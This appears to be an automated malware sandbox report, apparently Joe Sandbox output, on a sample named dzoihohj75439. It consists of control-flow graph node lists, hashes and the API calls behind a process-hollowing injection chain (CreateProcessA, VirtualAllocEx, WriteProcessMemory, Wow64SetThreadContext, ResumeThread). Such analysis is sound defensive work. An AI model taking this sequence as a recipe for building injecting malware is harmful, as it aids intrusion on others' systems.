14190->14190 14191->14190 14193 9f96e8 14192->14193 14194 9f9747 14192->14194 14197 9f6578 CreateProcessA 14193->14197 14230 9f6340 14194->14230 14195 9f9712 14195->14104 14197->14195 14199 9f61df WriteProcessMemory 14198->14199 14201 9f62cb 14199->14201 14201->14145 14203 9f622a WriteProcessMemory 14202->14203 14205 9f62cb 14203->14205 14205->14145 14207 9f5fd1 Wow64SetThreadContext 14206->14207 14209 9f604f 14207->14209 14209->14154 14211 9f5fd1 Wow64SetThreadContext 14210->14211 14213 9f604f 14211->14213 14213->14154 14215 9f5edc ResumeThread 14214->14215 14217 9f5f2e 14215->14217 14217->14164 14219 9f5e97 ResumeThread 14218->14219 14221 9f5f2e 14219->14221 14221->14164 14223 9f60fc VirtualAllocEx 14222->14223 14225 9f617a 14223->14225 14225->14178 14225->14181 14225->14182 14227 9f65ff CreateProcessA 14226->14227 14229 9f685d 14227->14229 14231 9f638c ReadProcessMemory 14230->14231 14233 9f640a 14231->14233 14233->14195

                                                                                        Executed Functions

                                                                                        Function 001FBC78 Relevance: 2.9, Strings: 2, Instructions: 375COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 938 1fbc78-1fbc9f 939 1fbcd7-1fbcdc 938->939 940 1fbca1-1fbca4 939->940 941 1fbcad-1fbcc4 940->941 942 1fbca6 940->942 955 1fbddf-1fbe57 941->955 964 1fbcca-1fbcd5 941->964 942->939 942->941 943 1fbdbf-1fbdd2 942->943 944 1fbcde-1fbcea 942->944 945 1fbd8b-1fbd93 942->945 946 1fbdd5-1fbdda 942->946 947 1fbd24-1fbd2d 942->947 948 1fbd44-1fbd5a 942->948 949 1fbd71-1fbd7e 942->949 950 1fbd81-1fbd86 942->950 953 1fbcec-1fbcf6 944->953 954 1fbd09-1fbd10 944->954 951 1fbd9a-1fbd9c 945->951 952 1fbd95-1fbd99 945->952 946->940 947->955 956 1fbd33-1fbd3f 947->956 948->955 969 1fbd60-1fbd6c 948->969 949->950 950->940 958 1fbd9e 951->958 959 1fbda8-1fbdaf 951->959 952->951 953->955 960 1fbcfc-1fbd02 953->960 954->955 961 1fbd16-1fbd22 954->961 972 1fbe90-1fbe95 955->972 956->940 965 1fbda3 958->965 959->955 967 1fbdb1-1fbdbd 959->967 966 1fbd07 960->966 961->966 964->940 965->940 966->940 967->965 969->940 973 1fbe59-1fbe5c 972->973 974 1fbe5e 973->974 975 1fbe65-1fbe7c 973->975 974->972 974->975 976 1fbf0d-1fbf15 974->976 977 1fbf4b-1fbf5b 974->977 978 1fbf4a 974->978 979 1fbf1a-1fbf2b 974->979 980 1fbe97-1fbea8 974->980 981 1fbf83-1fbf8d 974->981 982 1fbf60-1fbf67 974->982 983 1fbf90-1fbf97 974->983 989 1fbfa9-1fc020 975->989 992 1fbe82-1fbe8e 975->992 976->973 977->973 978->977 991 1fbf31-1fbf38 979->991 987 1fbeaa-1fbeb1 980->987 988 1fbf06-1fbf0b 980->988 985 1fbf6e-1fbf70 982->985 986 1fbf69-1fbf6d 982->986 983->989 990 1fbf99-1fbfa4 983->990 993 1fbf7c-1fbf81 985->993 994 1fbf72 985->994 986->985 987->989 995 1fbeb7-1fbecc 987->995 996 1fbf01 988->996 1001 1fc027-1fc047 989->1001 1002 1fc022 989->1002 990->973 991->989 997 1fbf3a-1fbf45 991->997 992->973 998 1fbf77 993->998 994->998 995->989 999 1fbed2-1fbeed 995->999 996->973 997->973 998->973 999->989 1003 1fbef3-1fbefc 999->1003 1004 1fc04d-1fc200 1001->1004 1005 1fc126-1fc12c 1001->1005 1002->1001 1003->996 1014 1fc2a7-1fc2ae 1004->1014 1006 1fc133-1fc139 1005->1006 1007 1fc13b 1006->1007 1008 1fc140-1fc160 1006->1008 1007->1008 1008->1006 1010 1fc162-1fc173 1008->1010 1012 1fc189-1fc19c 1010->1012 1013 1fc175-1fc186 1010->1013 1015 1fc112-1fc118 1012->1015 1016 1fc1a2-1fc1ad 1012->1016 1013->1012 1014->1015 1019 1fc121-1fc125 1015->1019 1017 1fc10b-1fc10d 1016->1017 1018 1fc1b3-1fc1f3 1016->1018 1017->1014 1017->1015 1019->1005
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: X+i$X+i
                                                                                        • API String ID: 0-2080308115
                                                                                        • Opcode ID: 0b1e50d661979ef3533fe8eeaff5bf0c1add687e87431b9dfe1df5e645bde863
                                                                                        • Instruction ID: d7ee00e3a321e2b2b8b3f3ba8edcbc6a98fcd10afd493c0d76be63bc8d4d9cd1
                                                                                        • Opcode Fuzzy Hash: 0b1e50d661979ef3533fe8eeaff5bf0c1add687e87431b9dfe1df5e645bde863
                                                                                        • Instruction Fuzzy Hash: 6BE18A31E0821CCFCB05CFA8C890AFEBBF5AF89304F15816AD619EB292D7349945DB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F133D Relevance: 1.6, Strings: 1, Instructions: 391COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $p
                                                                                        • API String ID: 0-1693848773
                                                                                        • Opcode ID: e5cc2f239051fd06e0152cd1ee92dd4695480bafc35b6767a60f91a4a3f76486
                                                                                        • Instruction ID: 4110de6fdba38b1c63b011a5f505b4ee1e7deb6a781e1aab8236759827937b83
                                                                                        • Opcode Fuzzy Hash: e5cc2f239051fd06e0152cd1ee92dd4695480bafc35b6767a60f91a4a3f76486
                                                                                        • Instruction Fuzzy Hash: 40E1273190C398DFCB16CFB4C8941F97BB0AF42310F5845ABD5959B693D3388A89DB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F8DB0 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Di
                                                                                        • API String ID: 0-1837014715
                                                                                        • Opcode ID: 8e823a38389c398d0e1fda160192d532335c5d22b148f6d351761945cbde1035
                                                                                        • Instruction ID: d0287679060cc41ffea5412470d2306bfc91bb67a402159fd5406c097ea77e5b
                                                                                        • Opcode Fuzzy Hash: 8e823a38389c398d0e1fda160192d532335c5d22b148f6d351761945cbde1035
                                                                                        • Instruction Fuzzy Hash: 37810531A08249CFCB15DFACC8906BABBB2FF85300F1545ABE256C7292DB34D945C711
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F7040 Relevance: .5, Instructions: 471COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6372e6a2915c523e274b91cfbdcfdf78b268fc7a5a0b3c2b99e8de762a3c14d7
                                                                                        • Instruction ID: 8e82f2ac6dca3cb3a1eaec9744e763393d25ada4c02ffabd38cefc17f09cd869
                                                                                        • Opcode Fuzzy Hash: 6372e6a2915c523e274b91cfbdcfdf78b268fc7a5a0b3c2b99e8de762a3c14d7
                                                                                        • Instruction Fuzzy Hash: 1B022E70D0C248CFDB15CFB8C8506B9BBB1AF46310F2986ABE651DB2E2D7349945CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001FD0B8 Relevance: .4, Instructions: 420COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 39e0133cdeb31b3d95a945e93f8148645abed565ec9e731fa6ab489cb6db765c
                                                                                        • Instruction ID: 6fbdfc6328451edc6a134e52e528eff24c11e4d2aaa49471b43ef707d7123086
                                                                                        • Opcode Fuzzy Hash: 39e0133cdeb31b3d95a945e93f8148645abed565ec9e731fa6ab489cb6db765c
                                                                                        • Instruction Fuzzy Hash: A2F12470A08209CFD714DBB8E8507BEBBB2BF85300F25816BE655DB296C734D942C752
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F788C Relevance: 6.8, Strings: 5, Instructions: 577COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: f"p$ f"p$ f"p$ f"p$ f"p
                                                                                        • API String ID: 0-1117118654
                                                                                        • Opcode ID: ade79ab1b8a76c05eca3ebfd516e5470ad15617de814a79652476f411fbabc4d
                                                                                        • Instruction ID: 3e3b7dbcb6b10fa2568b494b87ae57d7527ce13246cdfca2cf0ffb49973130b9
                                                                                        • Opcode Fuzzy Hash: ade79ab1b8a76c05eca3ebfd516e5470ad15617de814a79652476f411fbabc4d
                                                                                        • Instruction Fuzzy Hash: 4E22F331A0C248CFDB158FA8C8547BEBBA2AF41310F25466AE6169F3D5CF349D46CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 009F6578 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 321 9f6578-9f6611 323 9f665a-9f6682 321->323 324 9f6613-9f662a 321->324 327 9f66c8-9f671e 323->327 328 9f6684-9f6698 323->328 324->323 329 9f662c-9f6631 324->329 337 9f6764-9f685b CreateProcessA 327->337 338 9f6720-9f6734 327->338 328->327 339 9f669a-9f669f 328->339 330 9f6654-9f6657 329->330 331 9f6633-9f663d 329->331 330->323 332 9f663f 331->332 333 9f6641-9f6650 331->333 332->333 333->333 336 9f6652 333->336 336->330 357 9f685d-9f6863 337->357 358 9f6864-9f6949 337->358 338->337 346 9f6736-9f673b 338->346 340 9f66c2-9f66c5 339->340 341 9f66a1-9f66ab 339->341 340->327 343 9f66af-9f66be 341->343 344 9f66ad 341->344 343->343 347 9f66c0 343->347 344->343 349 9f675e-9f6761 346->349 350 9f673d-9f6747 346->350 347->340 349->337 351 9f674b-9f675a 350->351 352 9f6749 350->352 351->351 354 9f675c 351->354 352->351 354->349 357->358 370 9f694b-9f694f 358->370 371 9f6959-9f695d 358->371 370->371 372 9f6951 370->372 373 9f695f-9f6963 371->373 374 9f696d-9f6971 371->374 372->371 373->374 375 9f6965 373->375 376 9f6973-9f6977 374->376 377 9f6981-9f6985 374->377 375->374 376->377 378 9f6979 376->378 379 9f69bb-9f69c6 377->379 380 9f6987-9f69b0 377->380 378->377 383 9f69c7 379->383 380->379 383->383
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009F683F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID: [JD$[JD
                                                                                        • API String ID: 963392458-1854464392
                                                                                        • Opcode ID: 011baf5f666be8685115061e38d9bea25745641bc2e774ed659e03e4fafcf28e
                                                                                        • Instruction ID: 3b541c8937454e0c796a409f762fd83401410901216b139370bae610eb39af9a
                                                                                        • Opcode Fuzzy Hash: 011baf5f666be8685115061e38d9bea25745641bc2e774ed659e03e4fafcf28e
                                                                                        • Instruction Fuzzy Hash: D7C10171D0022D8FEF24CFA4C845BEEBBB1BB49304F1491A9D919B7280DB749A85CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001FB05D Relevance: 4.2, Strings: 3, Instructions: 451COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 385 1fb05d-1fb067 386 1fb071-1fb0d6 385->386 390 1fb0df-1fb0e0 386->390 391 1fb0d8 386->391 392 1fb137-1fb13d 390->392 391->390 393 1fb13f-1fb201 392->393 394 1fb0e2-1fb104 392->394 405 1fb203-1fb23c 393->405 406 1fb242-1fb246 393->406 395 1fb10b-1fb134 394->395 396 1fb106 394->396 395->392 396->395 405->406 407 1fb248-1fb281 406->407 408 1fb287-1fb28b 406->408 407->408 410 1fb28d-1fb2c6 408->410 411 1fb2cc-1fb2d0 408->411 410->411 413 1fb2d6-1fb2ee 411->413 414 1fb354-1fb3af 411->414 416 1fafce-1fafd2 413->416 417 1fb2f4-1fb2fb 413->417 432 1fb3e6-1fb410 414->432 433 1fb3b1-1fb3e4 414->433 418 1fafd4-1fb00c 416->418 419 1fb021-1fb057 416->419 421 1fb342-1fb346 417->421 447 1fb4c1-1fb4c6 418->447 419->385 434 1faef5-1faf02 419->434 422 1fb34c-1fb352 421->422 423 1faeaa-1faeae 421->423 422->414 424 1fb2fd-1fb33f 422->424 425 1faec3-1faec9 423->425 426 1faeb0-1faebe 423->426 424->421 431 1faf14-1faf18 425->431 430 1faf43-1faf75 426->430 461 1faf9f 430->461 462 1faf77-1faf83 430->462 436 1faecb-1faed7 431->436 437 1faf1a-1faf31 431->437 449 1fb419-1fb486 432->449 433->449 439 1faf08-1faf0f 434->439 440 1fae67-1fae8b 434->440 445 1faede-1faee3 436->445 446 1faed9 436->446 442 1faee6-1faeec 437->442 443 1faf33-1faf36 437->443 439->437 452 1faf39-1faf3d 440->452 455 1faeee-1faef2 442->455 456 1faf11 442->456 443->452 445->442 446->445 453 1fb4dd-1fb4fc 447->453 454 1fb4c8-1fb4d6 447->454 474 1fb48c-1fb498 449->474 452->430 457 1fae90-1faea7 452->457 463 1fae1f-1fb570 453->463 464 1fb502-1fb509 453->464 454->453 455->434 456->431 457->423 465 1fafa5-1fafcb 461->465 467 1faf8d-1faf93 462->467 468 1faf85-1faf8b 462->468 465->416 472 1faf9d 467->472 468->472 472->465 475 1fb49f-1fb4b2 474->475 475->447
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :$p!p$~
                                                                                        • API String ID: 0-320839381
                                                                                        • Opcode ID: 3fe92c4e691831cffc86f90b90bee34d06acc0d979977e1a8e1a609e3e0c24a8
                                                                                        • Instruction ID: 3cfc45814e29c433b3f9341bc218ab6f0c3669894765990fe06aebee8cfd5f6e
                                                                                        • Opcode Fuzzy Hash: 3fe92c4e691831cffc86f90b90bee34d06acc0d979977e1a8e1a609e3e0c24a8
                                                                                        • Instruction Fuzzy Hash: 6322B275900218DFDB65DFA4C984EA9BBB2FF48304F1580E5E609AB222D732ED91DF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 001F7CBE Relevance: 4.0, Strings: 3, Instructions: 211COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.359743852.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_1f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: f"p$ f"p$ f"p
                                                                                        • API String ID: 0-381425725
                                                                                        • Opcode ID: a842050f22e3178b32817cc8a7605dea201797800351e69bfb30c66fa397b921
                                                                                        • Instruction ID: dc61165d097ee5d6479cc5111b8ee012a1e9f76628377c49b603bb08abafad41
                                                                                        • Opcode Fuzzy Hash: a842050f22e3178b32817cc8a7605dea201797800351e69bfb30c66fa397b921
                                                                                        • Instruction Fuzzy Hash: 1C810231E0C29CCFDB298F64D854ABD7B72AF51300F66459AE601AB2D2CF309D46CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 009F61D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 138injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 665 9f61d8-9f61dd 666 9f61df-9f6225 665->666 667 9f6248 665->667 670 9f622a-9f622b 666->670 668 9f625a-9f625f 667->668 669 9f624a-9f624b 667->669 673 9f6260-9f6261 668->673 671 9f624d-9f6259 669->671 672 9f6262-9f62c9 WriteProcessMemory 669->672 670->673 674 9f622c-9f6247 670->674 671->668 676 9f62cb-9f62d1 672->676 677 9f62d2-9f6324 672->677 673->670 673->672 674->667 676->677
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 009F62B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID: [JD
                                                                                        • API String ID: 3559483778-2777496782
                                                                                        • Opcode ID: 927522229d9965d9b262114bea144d01a9787c7a631b8b8bf3a9d1e6846dede6
                                                                                        • Instruction ID: e276f643ccaccfc953e9ff7cffb5228a67be01c5074a3d57da79645565536afc
                                                                                        • Opcode Fuzzy Hash: 927522229d9965d9b262114bea144d01a9787c7a631b8b8bf3a9d1e6846dede6
                                                                                        • Instruction Fuzzy Hash: 8651EEB5D012499FCF00CFA9D984AEEBBB1AB49314F24942AE515BB210D739AA06CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 009F61E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 682 9f61e0-9f6225 683 9f622c-9f6248 682->683 685 9f625a-9f625f 683->685 686 9f624a-9f624b 683->686 689 9f6260-9f6261 685->689 687 9f624d-9f6259 686->687 688 9f6262-9f62c9 WriteProcessMemory 686->688 687->685 692 9f62cb-9f62d1 688->692 693 9f62d2-9f6324 688->693 689->688 690 9f622a-9f622b 689->690 690->683 690->689 692->693
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 009F62B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID: [JD
                                                                                        • API String ID: 3559483778-2777496782
                                                                                        • Opcode ID: 03bc1eec8048f0a6db2035c9a893d12b3874d24221cd5c0477e0fc25c84ce872
                                                                                        • Instruction ID: bf693bef69e856f48279ddc207ef3835a411d99621d7bb099722b98346da7d9f
                                                                                        • Opcode Fuzzy Hash: 03bc1eec8048f0a6db2035c9a893d12b3874d24221cd5c0477e0fc25c84ce872
                                                                                        • Instruction Fuzzy Hash: 4541AAB4D01258DFCF00CFA9D984AEEBBF1BB49314F20942AE814B7210D778AA45CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 009F6340 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 698 9f6340-9f6408 ReadProcessMemory 701 9f640a-9f6410 698->701 702 9f6411-9f6463 698->702 701->702
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 009F63F2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID: [JD
                                                                                        • API String ID: 1726664587-2777496782
                                                                                        • Opcode ID: 58615cd6dd30d56d140ffbe3b80670e815dc8660dad3edcecd29a7e545bdf962
                                                                                        • Instruction ID: 3678cc2e7b23ea397941ddc37c4bca955a3c43db7bef460cd7e50a90a5672b59
                                                                                        • Opcode Fuzzy Hash: 58615cd6dd30d56d140ffbe3b80670e815dc8660dad3edcecd29a7e545bdf962
                                                                                        • Instruction Fuzzy Hash: 4041B9B8D00258DFCF00CFA9D884AEEFBB1BB49310F20942AE814B7210C774AA45CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 009F60B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 707 9f60b8-9f6178 VirtualAllocEx 710 9f617a-9f6180 707->710 711 9f6181-9f61cb 707->711 710->711
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 009F6162
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID: [JD
                                                                                        • API String ID: 4275171209-2777496782
                                                                                        • Opcode ID: 45b676eeeb5c4f982cf68318546f3750440724473c5f53017a4750696c1238ad
                                                                                        • Instruction ID: 82e1e91d419f2d23962fc5f4346b85a046e9c44144b6793f781541a7c4a0ddb2
                                                                                        • Opcode Fuzzy Hash: 45b676eeeb5c4f982cf68318546f3750440724473c5f53017a4750696c1238ad
                                                                                        • Instruction Fuzzy Hash: 384199B8E00259DFCF10CFA9D984AEEFBB1BB49310F20942AE814B7210D735A905CF55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 009F5F88 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 716 9f5f88-9f5fe8 718 9f5fff-9f604d Wow64SetThreadContext 716->718 719 9f5fea-9f5ffc 716->719 721 9f604f-9f6055 718->721 722 9f6056-9f60a2 718->722 719->718 721->722
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 009F6037
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID: [JD
                                                                                        • API String ID: 983334009-2777496782
                                                                                        • Opcode ID: fa54a8c485f3c78f52dc20f48f688a5a0085efd976e5d05b8a46027fdcd83b81
                                                                                        • Instruction ID: 8b2e2a2d02730fa5671bad50da970c0cff5ee7ca27c23bb7fe77cc9e74d69a82
                                                                                        • Opcode Fuzzy Hash: fa54a8c485f3c78f52dc20f48f688a5a0085efd976e5d05b8a46027fdcd83b81
                                                                                        • Instruction Fuzzy Hash: DE41BCB4D00258DFDB10CFAAD884AEEBBF1AB49314F24802AE414B7240D778AA45CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 009F5F84 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 727 9f5f84-9f5fe8 729 9f5fff-9f604d Wow64SetThreadContext 727->729 730 9f5fea-9f5ffc 727->730 732 9f604f-9f6055 729->732 733 9f6056-9f60a2 729->733 730->729 732->733
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 009F6037
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID: [JD
                                                                                        • API String ID: 983334009-2777496782
                                                                                        • Opcode ID: b18b328197a35c3bf173b315f403ee04d41cf22c4dabfec3ae8ba6ac976620d1
                                                                                        • Instruction ID: 526e5fb9927abafa13ad6449b83b80c440c32b1168ed47b6710c13f3f06eae77
                                                                                        • Opcode Fuzzy Hash: b18b328197a35c3bf173b315f403ee04d41cf22c4dabfec3ae8ba6ac976620d1
                                                                                        • Instruction Fuzzy Hash: 8D41BAB4D00259DFDB10CFA9D984AEEBBF1BF48314F24842AE418B7250D738AA49CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 009F5E93 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 738 9f5e93-9f5f2c ResumeThread 742 9f5f2e-9f5f34 738->742 743 9f5f35-9f5f77 738->743 742->743
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID: [JD
                                                                                        • API String ID: 947044025-2777496782
                                                                                        • Opcode ID: 5be6cb0a64c1becf52a8961ece635d3e57325d2f94058d0c52a9d572a610442f
                                                                                        • Instruction ID: 49ec2f0ed4d2ae40f0b4a920a99ffb82a89606c10e0ba871ed71259591b6e0d6
                                                                                        • Opcode Fuzzy Hash: 5be6cb0a64c1becf52a8961ece635d3e57325d2f94058d0c52a9d572a610442f
                                                                                        • Instruction Fuzzy Hash: 7131E9B8D10248DFCF10CFA9D884AEEFBB0AF89314F24846AE914B7210C734A905CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 009F5E98 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 748 9f5e98-9f5f2c ResumeThread 751 9f5f2e-9f5f34 748->751 752 9f5f35-9f5f77 748->752 751->752
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.361089475.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_9f0000_dzoihohj75439.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID: [JD
                                                                                        • API String ID: 947044025-2777496782
